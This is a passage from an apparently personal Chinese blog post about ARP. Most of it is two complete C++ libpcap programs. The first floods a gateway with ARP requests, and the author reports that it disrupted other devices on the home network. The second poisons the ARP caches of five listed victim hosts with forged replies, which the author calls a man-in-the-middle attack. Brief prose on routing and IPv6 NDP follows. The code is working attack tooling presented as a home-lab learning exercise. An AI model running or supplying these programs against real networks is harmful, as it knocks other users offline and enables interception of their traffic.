class="built_in">htons</span>(<span class="number">0x0001</span>);</span><br><span class="line">    arp_header.protocol_type = <span class="built_in">htons</span>(<span class="number">0x0800</span>);</span><br><span class="line">    arp_header.hardware_len = <span class="number">6</span>;</span><br><span class="line">    arp_header.protocol_len = <span class="number">4</span>;</span><br><span class="line">    arp_header.option = <span class="built_in">htons</span>(<span class="number">0x0001</span>); <span class="comment">// arp request</span></span><br><span class="line"></span><br><span class="line">    arp_header.src_ip = <span class="built_in">inet_addr</span>(srcip);</span><br><span class="line">    <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; <span class="number">6</span>; i++)</span><br><span class="line">        arp_header.src_mac[i] = SRC_MAC[i];</span><br><span class="line"></span><br><span class="line">    <span class="comment">// string ret = victim_ip + to_string(num);</span></span><br><span class="line">    <span class="comment">// arp_header.dst_ip = inet_addr(ret.c_str());</span></span><br><span class="line">    arp_header.dst_ip = <span class="built_in">inet_addr</span>(victim_ip);</span><br><span class="line">    <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; <span class="number">6</span>; i++)</span><br><span class="line">        arp_header.dst_mac[i] = VICTIM_MAC[i];</span><br><span class="line"></span><br><span class="line">    <span class="built_in">memcpy</span>(tmpBuf + <span class="number">0</span>, &amp;arp_header.hardware_type, <span class="number">2</span>);</span><br><span class="line">    <span class="built_in">memcpy</span>(tmpBuf + <span class="number">2</span>, &amp;arp_header.protocol_type, <span class="number">2</span>);</span><br><span class="line">    <span class="built_in">memcpy</span>(tmpBuf + <span class="number">4</span>, &amp;arp_header.hardware_len, <span class="number">1</span>);</span><br><span class="line">    <span class="built_in">memcpy</span>(tmpBuf + <span class="number">5</span>, &amp;arp_header.protocol_len, <span class="number">1</span>);</span><br><span class="line">    <span class="built_in">memcpy</span>(tmpBuf + <span class="number">6</span>, &amp;arp_header.option, <span class="number">2</span>);</span><br><span class="line">    <span class="built_in">memcpy</span>(tmpBuf + <span class="number">8</span>, &amp;arp_header.src_mac, <span class="number">6</span>);</span><br><span class="line">    <span class="built_in">memcpy</span>(tmpBuf + <span class="number">14</span>, &amp;arp_header.src_ip, <span class="number">4</span>);</span><br><span class="line">    <span class="built_in">memcpy</span>(tmpBuf + <span class="number">18</span>, &amp;arp_header.dst_mac, <span class="number">6</span>);</span><br><span class="line">    <span class="built_in">memcpy</span>(tmpBuf + <span class="number">24</span>, &amp;arp_header.dst_ip, <span class="number">4</span>);</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">pcap_t</span> *fp;</span><br><span class="line">    <span class="type">char</span> errbuf[PCAP_ERRBUF_SIZE];</span><br><span class="line">    u_char packet[<span class="number">42</span>];</span><br><span class="line">    <span class="type">pcap_if_t</span> *alldevs;</span><br><span class="line">    <span class="type">pcap_if_t</span> *d;</span><br><span class="line">    <span class="type">int</span> inum;</span><br><span class="line">    <span class="type">int</span> i = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* 检测网卡 */</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">pcap_findalldevs</span>(&amp;alldevs, errbuf) == <span class="number">-1</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">fprintf</span>(stderr, <span class="string">&quot;Error in pcap_findalldevs: %s\n&quot;</span>, errbuf);</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">1</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">/* 打印网卡 */</span></span><br><span class="line">    <span class="keyword">for</span> (d = alldevs; d; d = d-&gt;next)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;%d. %s&quot;</span>, ++i, d-&gt;name);</span><br><span class="line">        <span class="keyword">if</span> (d-&gt;description)</span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">&quot; (%s)\n&quot;</span>, d-&gt;description);</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">&quot; (No description available)\n&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (i == <span class="number">0</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;\nNo interfaces found! Make sure WinPcap is installed.\n&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Enter the interface number (1-%d):&quot;</span>, i);</span><br><span class="line">    <span class="built_in">scanf</span>(<span class="string">&quot;%d&quot;</span>, &amp;inum);</span><br><span class="line">    <span class="keyword">if</span> (inum &lt; <span class="number">1</span> || inum &gt; i)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;\nInterface number out of range.\n&quot;</span>);</span><br><span class="line">        <span class="built_in">pcap_freealldevs</span>(alldevs);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">/* 选择 */</span></span><br><span class="line">    <span class="keyword">for</span> (d = alldevs, i = <span class="number">0</span>; i &lt; inum - <span class="number">1</span>; d = d-&gt;next, i++)</span><br><span class="line">        ;</span><br><span class="line">    <span class="comment">/* 打开输出设备 */</span></span><br><span class="line">    <span class="keyword">if</span> ((fp = <span class="built_in">pcap_open_live</span>(d-&gt;name, <span class="comment">// name of the device</span></span><br><span class="line">                             <span class="number">65535</span>,   <span class="comment">// portion of the packet to capture.</span></span><br><span class="line">                             <span class="comment">// 65536 grants that the whole packet will be captured on all the MACs.</span></span><br><span class="line">                             <span class="number">1</span>,     <span class="comment">// promiscuous mode (nonzero means promiscuous)</span></span><br><span class="line">                             <span class="number">0</span>,     <span class="comment">// read timeout</span></span><br><span class="line">                             errbuf <span class="comment">// error buffer</span></span><br><span class="line">                             )) == <span class="literal">NULL</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">fprintf</span>(stderr, <span class="string">&quot;\nUnable to open the adapter. %s is not supported by WinPcap\n&quot;</span>, d-&gt;name);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;open succeed!\n&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 把以太网头复制到缓冲区</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; <span class="number">6</span>; i++)</span><br><span class="line">        packet[i] = BROADCAST_MAC[i];</span><br><span class="line">    <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">6</span>; i &lt; <span class="number">12</span>; i++)</span><br><span class="line">        packet[i] = SRC_MAC[i - <span class="number">6</span>];</span><br><span class="line">    packet[<span class="number">12</span>] = <span class="number">0x08</span>;</span><br><span class="line">    packet[<span class="number">13</span>] = <span class="number">0x06</span>;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">InitARPHeader</span>(packet + <span class="number">14</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* 发送数据包 */</span></span><br><span class="line">    <span class="type">long</span> <span class="type">long</span> count = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">for</span> (<span class="type">long</span> k = <span class="number">0</span>; k &lt; <span class="number">1000000</span>; ++k)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">pcap_sendpacket</span>(fp, (<span class="type">const</span> u_char *)&amp;packet, <span class="built_in">sizeof</span>(packet)) != <span class="number">0</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="built_in">fprintf</span>(stderr, <span class="string">&quot;\nError sending the packet: %s\n&quot;</span>, <span class="built_in">pcap_geterr</span>(fp));</span><br><span class="line">            <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="built_in">usleep</span>(<span class="number">100</span>);</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;send succeed %lld times!\n&quot;</span>, ++count);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​	当按下命令的那一刻，虚拟机以每秒上千个 ARP request packet 的速率向网关发起了泛洪攻击，如下图所示，此时能够明显感受到网络中其他手机平板设备网络出现阻塞以及中断的现象。</p>
<p><img src="https://s2.loli.net/2023/08/22/tErosQqWnAbI1YZ.png" alt="image.png"></p>
<p><img src="https://s2.loli.net/2023/08/22/FQ9uCrmhBpSa3vK.jpg" alt="net.jpg"></p>
<h3 id="ARP中间人攻击"><a href="#ARP中间人攻击" class="headerlink" title="ARP中间人攻击"></a>ARP中间人攻击</h3><p>​	通过对上面的代码一些简单的修改，就能实现对网段内的所有设备进行依次询问（本网段从192.168.31.1到192.168.31.255的轮询），理论上就可以得到它们的IP及对应的MAC地址的响应包。当然由于这是我自家的路由器，也可以直接在浏览器输入192.168.31.1网关IP登录后台进行查看。将得到的结果记录下来，再构造一个 ARP reply包，就可以定向对某台设备进行ARP中间人攻击，代码如下，和上面的 ARP request代码很类似。具体代码如下，</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;arpa/inet.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;cstring&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;iostream&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;pcap.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span class="line"><span class="meta">#<span class="keyword">pragma</span> pack(push) <span class="comment">// 保持对齐方式</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">pragma</span> pack(1)	   <span class="comment">// 设定1位对齐</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">pragma</span> comment(lib, <span class="string">&quot;ws2_32.lib&quot;</span>)</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 攻击者ip及mac地址</span></span><br><span class="line"><span class="type">const</span> <span class="type">char</span> *srcip = <span class="string">&quot;192.168.31.50&quot;</span>;</span><br><span class="line">u_char SRC_MAC[<span class="number">6</span>] = &#123;<span class="number">0xC8</span>, <span class="number">0x58</span>, <span class="number">0xC0</span>, <span class="number">0xC1</span>, <span class="number">0x5B</span>, <span class="number">0xC9</span>&#125;;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 攻击目标</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> ATTACK_NUM 5</span></span><br><span class="line"><span class="type">const</span> <span class="type">char</span> *victimip[ATTACK_NUM] = &#123;<span class="string">&quot;192.168.31.145&quot;</span>,</span><br><span class="line">									<span class="string">&quot;192.168.31.168&quot;</span>,</span><br><span class="line">									<span class="string">&quot;192.168.31.233&quot;</span>,</span><br><span class="line">									<span class="string">&quot;192.168.31.220&quot;</span>,</span><br><span class="line">									<span class="string">&quot;192.168.31.188&quot;</span>&#125;;</span><br><span class="line">u_char VICTIM_MAC[ATTACK_NUM][<span class="number">6</span>] = &#123;</span><br><span class="line">	&#123;<span class="number">0x96</span>, <span class="number">0x90</span>, <span class="number">0x29</span>, <span class="number">0xBB</span>, <span class="number">0xAF</span>, <span class="number">0x1C</span>&#125;,</span><br><span class="line">	&#123;<span class="number">0x40</span>, <span class="number">0xB6</span>, <span class="number">0xE7</span>, <span class="number">0xEF</span>, <span class="number">0xC3</span>, <span class="number">0x48</span>&#125;,</span><br><span class="line">	&#123;<span class="number">0xE0</span>, <span class="number">0x1F</span>, <span class="number">0x88</span>, <span class="number">0x30</span>, <span class="number">0x73</span>, <span class="number">0xBC</span>&#125;,</span><br><span class="line">	&#123;<span class="number">0x98</span>, <span class="number">0x2F</span>, <span class="number">0x3C</span>, <span class="number">0xB2</span>, <span class="number">0x5B</span>, <span class="number">0xF1</span>&#125;,</span><br><span class="line">	&#123;<span class="number">0x9E</span>, <span class="number">0x78</span>, <span class="number">0xB7</span>, <span class="number">0x94</span>, <span class="number">0x6B</span>, <span class="number">0x29</span>&#125;&#125;;</span><br><span class="line"></span><br><span class="line">string polluteip = <span class="string">&quot;192.168.31.&quot;</span>;</span><br><span class="line">u_char FAKE_MAC[<span class="number">6</span>] = &#123;<span class="number">0x01</span>, <span class="number">0x01</span>, <span class="number">0x01</span>, <span class="number">0x01</span>, <span class="number">0x01</span>, <span class="number">0x01</span>&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> <span class="title class_">_eth_header</span></span><br><span class="line">&#123;</span><br><span class="line">	<span class="type">unsigned</span> <span class="type">char</span> dst_mac[<span class="number">6</span>];</span><br><span class="line">	<span class="type">unsigned</span> <span class="type">char</span> src_mac[<span class="number">6</span>];</span><br><span class="line">	<span class="type">unsigned</span> <span class="type">short</span> type;</span><br><span class="line">&#125; ETH_HEADER;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> <span class="title class_">_arp_header</span></span><br><span class="line">&#123;</span><br><span class="line">	<span class="type">unsigned</span> <span class="type">short</span> hardware_type;</span><br><span class="line">	<span class="type">unsigned</span> <span class="type">short</span> protocol_type;</span><br><span class="line">	<span class="type">unsigned</span> <span class="type">char</span> hardware_len;</span><br><span class="line">	<span class="type">unsigned</span> <span class="type">char</span> protocol_len;</span><br><span class="line">	<span class="type">unsigned</span> <span class="type">short</span> option;</span><br><span class="line">	<span class="type">unsigned</span> <span class="type">char</span> src_mac[<span class="number">6</span>];</span><br><span class="line">	<span class="type">unsigned</span> <span class="type">long</span> src_ip;</span><br><span class="line">	<span class="type">unsigned</span> <span class="type">char</span> dst_mac[<span class="number">6</span>];</span><br><span class="line">	<span class="type">unsigned</span> <span class="type">long</span> dst_ip;</span><br><span class="line">&#125; ARP_HEADER;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> <span class="title class_">_arp_packet</span></span><br><span class="line">&#123;</span><br><span class="line">	ETH_HEADER eth_header;</span><br><span class="line">	ARP_HEADER arp_header;</span><br><span class="line">&#125; ARP_PACKET;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">InitARPHeader</span><span class="params">(u_char *tmpBuf, <span class="type">int</span> ip_num, <span class="type">int</span> num)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	ARP_HEADER arp_header;</span><br><span class="line">	<span class="type">int</span> arpsize = <span class="built_in">sizeof</span>(ARP_HEADER);</span><br><span class="line"></span><br><span class="line">	arp_header.hardware_type = <span class="built_in">htons</span>(<span class="number">0x0001</span>);</span><br><span class="line">	arp_header.protocol_type = <span class="built_in">htons</span>(<span class="number">0x0800</span>);</span><br><span class="line">	arp_header.hardware_len = <span class="number">6</span>;</span><br><span class="line">	arp_header.protocol_len = <span class="number">4</span>;</span><br><span class="line">	arp_header.option = <span class="built_in">htons</span>(<span class="number">0x0002</span>);</span><br><span class="line"></span><br><span class="line">	string ret = polluteip + <span class="built_in">to_string</span>(ip_num);</span><br><span class="line">	arp_header.src_ip = <span class="built_in">inet_addr</span>(ret.<span class="built_in">c_str</span>());</span><br><span class="line">	<span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; <span class="number">6</span>; i++)</span><br><span class="line">		arp_header.src_mac[i] = FAKE_MAC[i];</span><br><span class="line">	arp_header.dst_ip = <span class="built_in">inet_addr</span>(victimip[num]);</span><br><span class="line">	<span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; <span class="number">6</span>; i++)</span><br><span class="line">		arp_header.dst_mac[i] = VICTIM_MAC[num][i];</span><br><span class="line"></span><br><span class="line">	<span class="built_in">memcpy</span>(tmpBuf + <span class="number">0</span>, &amp;arp_header.hardware_type, <span class="number">2</span>);</span><br><span class="line">	<span class="built_in">memcpy</span>(tmpBuf + <span class="number">2</span>, &amp;arp_header.protocol_type, <span class="number">2</span>);</span><br><span class="line">	<span class="built_in">memcpy</span>(tmpBuf + <span class="number">4</span>, &amp;arp_header.hardware_len, <span class="number">1</span>);</span><br><span class="line">	<span class="built_in">memcpy</span>(tmpBuf + <span class="number">5</span>, &amp;arp_header.protocol_len, <span class="number">1</span>);</span><br><span class="line">	<span class="built_in">memcpy</span>(tmpBuf + <span class="number">6</span>, &amp;arp_header.option, <span class="number">2</span>);</span><br><span class="line">	<span class="built_in">memcpy</span>(tmpBuf + <span class="number">8</span>, &amp;arp_header.src_mac, <span class="number">6</span>);</span><br><span class="line">	<span class="built_in">memcpy</span>(tmpBuf + <span class="number">14</span>, &amp;arp_header.src_ip, <span class="number">4</span>);</span><br><span class="line">	<span class="built_in">memcpy</span>(tmpBuf + <span class="number">18</span>, &amp;arp_header.dst_mac, <span class="number">6</span>);</span><br><span class="line">	<span class="built_in">memcpy</span>(tmpBuf + <span class="number">24</span>, &amp;arp_header.dst_ip, <span class="number">4</span>);</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="type">pcap_t</span> *fp;</span><br><span class="line">	<span class="type">char</span> errbuf[PCAP_ERRBUF_SIZE];</span><br><span class="line">	u_char packet[<span class="number">42</span>];</span><br><span class="line">	<span class="type">pcap_if_t</span> *alldevs;</span><br><span class="line">	<span class="type">pcap_if_t</span> *d;</span><br><span class="line">	<span class="type">int</span> inum;</span><br><span class="line">	<span class="type">int</span> i = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">	<span class="comment">/* 检测网卡 */</span></span><br><span class="line">	<span class="keyword">if</span> (<span class="built_in">pcap_findalldevs</span>(&amp;alldevs, errbuf) == <span class="number">-1</span>)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">fprintf</span>(stderr, <span class="string">&quot;Error in pcap_findalldevs: %s\n&quot;</span>, errbuf);</span><br><span class="line">		<span class="built_in">exit</span>(<span class="number">1</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="comment">/* 打印网卡 */</span></span><br><span class="line">	<span class="keyword">for</span> (d = alldevs; d; d = d-&gt;next)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;%d. %s&quot;</span>, ++i, d-&gt;name);</span><br><span class="line">		<span class="keyword">if</span> (d-&gt;description)</span><br><span class="line">			<span class="built_in">printf</span>(<span class="string">&quot; (%s)\n&quot;</span>, d-&gt;description);</span><br><span class="line">		<span class="keyword">else</span></span><br><span class="line">			<span class="built_in">printf</span>(<span class="string">&quot; (No description available)\n&quot;</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span> (i == <span class="number">0</span>)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;\nNo interfaces found! Make sure WinPcap is installed.\n&quot;</span>);</span><br><span class="line">		<span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;Enter the interface number (1-%d):&quot;</span>, i);</span><br><span class="line">	<span class="built_in">scanf</span>(<span class="string">&quot;%d&quot;</span>, &amp;inum);</span><br><span class="line">	<span class="keyword">if</span> (inum &lt; <span class="number">1</span> || inum &gt; i)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;\nInterface number out of range.\n&quot;</span>);</span><br><span class="line">		<span class="comment">/* 释放 */</span></span><br><span class="line">		<span class="built_in">pcap_freealldevs</span>(alldevs);</span><br><span class="line">		<span class="keyword">return</span> <span class="number">2</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="comment">/* 选择 */</span></span><br><span class="line">	<span class="keyword">for</span> (d = alldevs, i = <span class="number">0</span>; i &lt; inum - <span class="number">1</span>; d = d-&gt;next, i++)</span><br><span class="line">		;</span><br><span class="line">	<span class="comment">/* 打开输出设备 */</span></span><br><span class="line">	<span class="keyword">if</span> ((fp = <span class="built_in">pcap_open_live</span>(d-&gt;name, <span class="comment">// name of the device</span></span><br><span class="line">							 <span class="number">65536</span>,	  <span class="comment">// portion of the packet to capture.</span></span><br><span class="line">							 <span class="comment">// 65536 grants that the whole packet will be captured on all the MACs.</span></span><br><span class="line">							 <span class="number">1</span>,		<span class="comment">// promiscuous mode (nonzero means promiscuous)</span></span><br><span class="line">							 <span class="number">0</span>,		<span class="comment">// read timeout</span></span><br><span class="line">							 errbuf <span class="comment">// error buffer</span></span><br><span class="line">							 )) == <span class="literal">NULL</span>)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">fprintf</span>(stderr, <span class="string">&quot;\nUnable to open the adapter. %s is not supported by WinPcap\n&quot;</span>, d-&gt;name);</span><br><span class="line">		<span class="keyword">return</span> <span class="number">3</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span></span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;open succeed!\n&quot;</span>);</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">6</span>; i &lt; <span class="number">12</span>; i++)</span><br><span class="line">		packet[i] = SRC_MAC[i - <span class="number">6</span>];</span><br><span class="line">	packet[<span class="number">12</span>] = <span class="number">0x08</span>;</span><br><span class="line">	packet[<span class="number">13</span>] = <span class="number">0x06</span>;</span><br><span class="line"></span><br><span class="line">	<span class="comment">/* 打印ARP包</span></span><br><span class="line"><span class="comment">	for (int i = 0; i &lt; 42; i++)</span></span><br><span class="line"><span class="comment">		cout &lt;&lt; hex &lt;&lt; (int)packet[i] &lt;&lt; &quot; &quot;;</span></span><br><span class="line"><span class="comment">	cout &lt;&lt; endl;</span></span><br><span class="line"><span class="comment">	*/</span></span><br><span class="line"></span><br><span class="line">	<span class="type">long</span> <span class="type">long</span> count = <span class="number">0</span>;</span><br><span class="line">	<span class="keyword">for</span> (<span class="type">int</span> k = <span class="number">0</span>; k &lt; <span class="number">10000</span>; ++k)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="keyword">for</span> (<span class="type">int</span> j = <span class="number">2</span>; j &lt; <span class="number">254</span>; ++j)</span><br><span class="line">		&#123;</span><br><span class="line">			<span class="keyword">for</span> (<span class="type">int</span> num = <span class="number">0</span>; num &lt; ATTACK_NUM; ++num)</span><br><span class="line">			&#123;</span><br><span class="line">				<span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; <span class="number">6</span>; i++)</span><br><span class="line">					packet[i] = VICTIM_MAC[num][i];</span><br><span class="line">				<span class="built_in">InitARPHeader</span>(packet + <span class="number">14</span>, <span class="number">1</span>, num);</span><br><span class="line"></span><br><span class="line">				<span class="keyword">if</span> (<span class="built_in">pcap_sendpacket</span>(fp, (<span class="type">const</span> u_char *)&amp;packet, <span class="built_in">sizeof</span>(packet)) != <span class="number">0</span>)</span><br><span class="line">				&#123;</span><br><span class="line">					<span class="built_in">fprintf</span>(stderr, <span class="string">&quot;\nError sending the packet: %s\n&quot;</span>, <span class="built_in">pcap_geterr</span>(fp));</span><br><span class="line">					<span class="keyword">return</span> <span class="number">3</span>;</span><br><span class="line">				&#125;</span><br><span class="line">				<span class="built_in">usleep</span>(<span class="number">100</span>);</span><br><span class="line">				<span class="built_in">printf</span>(<span class="string">&quot;send succeed %lld times!\n&quot;</span>, ++count);</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​	当然，ARP协议只用于局域网内的设备寻址，当两个路由器之间通信时，会采用基于LS或DV等算法的BGP（Border Gateway Protocol，边界网关协议），OSPF（Open Shortest Path First，开放最短路径优先协议）等进行通信，具体来说就是会根据数据包的目的IP地址决定从哪个端口转发出去，而不会直接使用到MAC地址作为路由。总结就是：<strong>MAC地址是局域网（LAN）层级的地址，在局域网内起作用；而IP地址和路由表用于跨越不同局域网的通信。</strong></p>
<p>​	最后，ARP是基于IPv4的协议。在IPv6中，地址解析将由NDP（邻居发现协议，Neighbor Discovery Protocol）实现，它使用一系列IPv6控制信息报文（ICMPv6）来实现相邻节点（同一链路上的节点）的交互管理，并在一个子网中保持网络层地址和数据链路层地址之间的映射。邻居发现协议中定义了5种类型的信息：路由器宣告、路由器请求、路由重定向、邻居请求和邻居宣告。与ARP相比，NDP可以实现路由器发现、前缀发现、参数发现、地址自动配置、地址解析（代替ARP和RARP）、下一跳确定、邻居不可达检测、重复地址检测、重定向等更多功能。</p>
<hr>
<h2 id="踩坑补充"><a href="#踩坑补充" class="headerlink" title="踩坑补充"></a>踩坑补充</h2><ol>
